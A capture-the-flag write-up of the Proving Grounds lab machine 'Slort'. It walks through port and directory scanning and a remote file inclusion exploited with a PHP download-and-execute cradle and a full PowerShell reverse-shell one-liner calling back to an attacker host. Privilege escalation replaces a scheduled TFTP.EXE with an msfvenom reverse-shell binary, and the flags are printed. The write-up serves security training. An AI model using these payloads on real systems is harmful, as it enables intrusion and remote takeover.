Slort
Enumeration:
Port Scanning:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Slort]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 192.168.182.53
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-10 10:43 EST
Nmap scan report for 192.168.182.53
Host is up, received reset ttl 125 (0.11s latency).
Scanned at 2025-11-10 10:43:18 EST for 195s
Not shown: 65521 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 125 FileZilla ftpd 0.9.41 beta
| ftp-syst:
|_ SYST: UNIX emulated by FileZilla
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack ttl 125
3306/tcp open mysql syn-ack ttl 125 MariaDB 10.3.24 or later (unauthorized)
4443/tcp open http syn-ack ttl 125 Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-favicon: Unknown favicon MD5: 6EB4A43CB64C97F76562AF703893C8FD
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.182.53:4443/dashboard/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
5040/tcp open unknown syn-ack ttl 125
8080/tcp open http syn-ack ttl 125 Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-open-proxy: Proxy might be redirecting requests
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.182.53:8080/dashboard/
|_http-favicon: Unknown favicon MD5: 6EB4A43CB64C97F76562AF703893C8FD
49664/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49669/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
<snipped>We have filezilla ftp running on port 21, smb on port 445, and http on ports 8080, and 4443.
HTTP (8080):
If we visited that port on firefox:
We will be presented with the xampp welcoming page.
Directory Fuzzing:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Slort]
└─$ gobuster dir -u http://192.168.182.53:8080 -w /usr/share/wordlists/dirb/common.txt -x php,html -t 40
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.182.53:8080
[+] Method: GET
[+] Threads: 40
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Extensions: php,html
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
<snipped>
/applications.html (Status: 200) [Size: 3607]
<snipped>
/dashboard (Status: 301) [Size: 351] [--> http://192.168.182.53:8080/dashboard/]
/favicon.ico (Status: 200) [Size: 30894]
/examples (Status: 503) [Size: 1060]
/img (Status: 301) [Size: 345] [--> http://192.168.182.53:8080/img/]
/index.php (Status: 302) [Size: 0] [--> http://192.168.182.53:8080/dashboard/]
/index.php (Status: 302) [Size: 0] [--> http://192.168.182.53:8080/dashboard/]
/Index.php (Status: 302) [Size: 0] [--> http://192.168.182.53:8080/dashboard/]
<snipped>
/site (Status: 301) [Size: 346] [--> http://192.168.182.53:8080/site/]
<snipped>
Progress: 18452 / 18452 (100.00%)
===============================================================
Finished
===============================================================Navigate to that directory:
Exploitaion:
Immediately the paramter will catch our attention.
Test it for LFI:
I could not go further with this.
But lets test for RFI as well:
┌──(kali㉿kali)-[~/…/OffsecPG/Practice/Slort/www]
└─$ echo 'test' >> test.txt
┌──(kali㉿kali)-[~/…/OffsecPG/Practice/Slort/www]
└─$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
Open that file:
┌──(kali㉿kali)-[~/…/OffsecPG/Practice/Slort/www]
└─$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.182.53 - - [10/Nov/2025 11:56:21] "GET / HTTP/1.0" 200 -
192.168.182.53 - - [10/Nov/2025 11:56:44] "GET /test.txt HTTP/1.0" 200 -We have RFI here.
I wrote this simple php script to download and execute powershell script in memory:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Slort]
└─$ cat shell.ps1
$client = New-Object System.Net.Sockets.TCPClient('192.168.45.187',4443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Slort]
└─$ cat webshell.php
<?php
$web_cradle = system('powershell -c IEX(IWR -UseBasicParsing -Uri http://192.168.45.187:8000/shell.ps1)');
?>Start netcat listener:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Slort]
└─$ rlwrap nc -nlvp 4443
listening on [any] 4443 ...Open that webshell.php through our RFI:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Slort]
└─$ rlwrap nc -nlvp 4443
listening on [any] 4443 ...
connect to [192.168.45.187] from (UNKNOWN) [192.168.182.53] 52425
PS C:\xampp\htdocs\site> whoami
slort\rupertHere we have a reverse shell.
Post-Exploitation:
After doing some local enumeration, we will find that directory under the C:
PS C:\> dir
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 7/20/2020 7:08 AM Backup
d----- 12/7/2019 1:14 AM PerfLogs
d-r--- 5/4/2022 1:06 AM Program Files
d-r--- 12/3/2021 8:22 AM Program Files (x86)
d-r--- 12/3/2021 8:29 AM Users
d----- 5/4/2022 1:52 AM Windows
d----- 6/12/2020 8:11 AM xampp
-a---- 11/10/2025 7:37 AM 2848 output.txt
PS C:\> cd Backup
PS C:\Backup> dir
Directory: C:\Backup
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/12/2020 7:45 AM 11304 backup.txt
-a---- 6/12/2020 7:45 AM 73 info.txt
-a---- 6/23/2020 7:49 PM 73802 TFTP.EXE
PS C:\Backup> cat info.txt
Run every 5 minutes:
C:\Backup\TFTP.EXE -i 192.168.234.57 get backup.txtSo if we can place our executable here instead of TFTP.EXE, we can get reverse shell as the user running this executable.
Test if we can write to that directory:
PS C:\Backup> dir
Directory: C:\Backup
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/12/2020 7:45 AM 11304 backup.txt
-a---- 6/12/2020 7:45 AM 73 info.txt
-a---- 11/10/2025 8:26 AM 8 test.txt
-a---- 6/23/2020 7:49 PM 73802 TFTP.EXE
PS C:\Backup> del test.txtYes we can.
Create a reverse shell with msfvenom:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Slort]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.187 LPORT=4443 -f exe -o shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7680 bytes
Saved as: shell.exeUpload it:
PS C:\Backup> move-item tftp.exe tftp.exe.bak
PS C:\Backup> dir
Directory: C:\Backup
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/12/2020 7:45 AM 11304 backup.txt
-a---- 6/12/2020 7:45 AM 73 info.txt
-a---- 6/23/2020 7:49 PM 73802 tftp.exe.bak
PS C:\Backup> curl http://192.168.45.187:8000/shell.exe -o TFTP.EXE
PS C:\Backup> dir
Directory: C:\Backup
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/12/2020 7:45 AM 11304 backup.txt
-a---- 6/12/2020 7:45 AM 73 info.txt
-a---- 11/10/2025 8:35 AM 7680 TFTP.EXE
-a---- 6/23/2020 7:49 PM 73802 tftp.exe.bakStart another netcat listener, and wait up to 5 minutes:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Slort]
└─$ rlwrap nc -nlvp 4443
listening on [any] 4443 ...After waiting for like 4 minutes, we got a reverse shell:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Slort]
└─$ rlwrap nc -nlvp 4443
listening on [any] 4443 ...
connect to [192.168.45.187] from (UNKNOWN) [192.168.182.53] 53122
Microsoft Windows [Version 10.0.19042.1387]
(c) Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>whoami
slort\administratorGet the flags:
C:\WINDOWS\system32>type C:\Users\Administrator\Desktop>\roof.txt
9a44be6d7326dca2de6a836989baabc4
C:\WINDOWS\system32>type C:\Users\rupert\Desktop\ocal.txt
a0e693a29df1aa3f344d200cc3cf4a40Last updated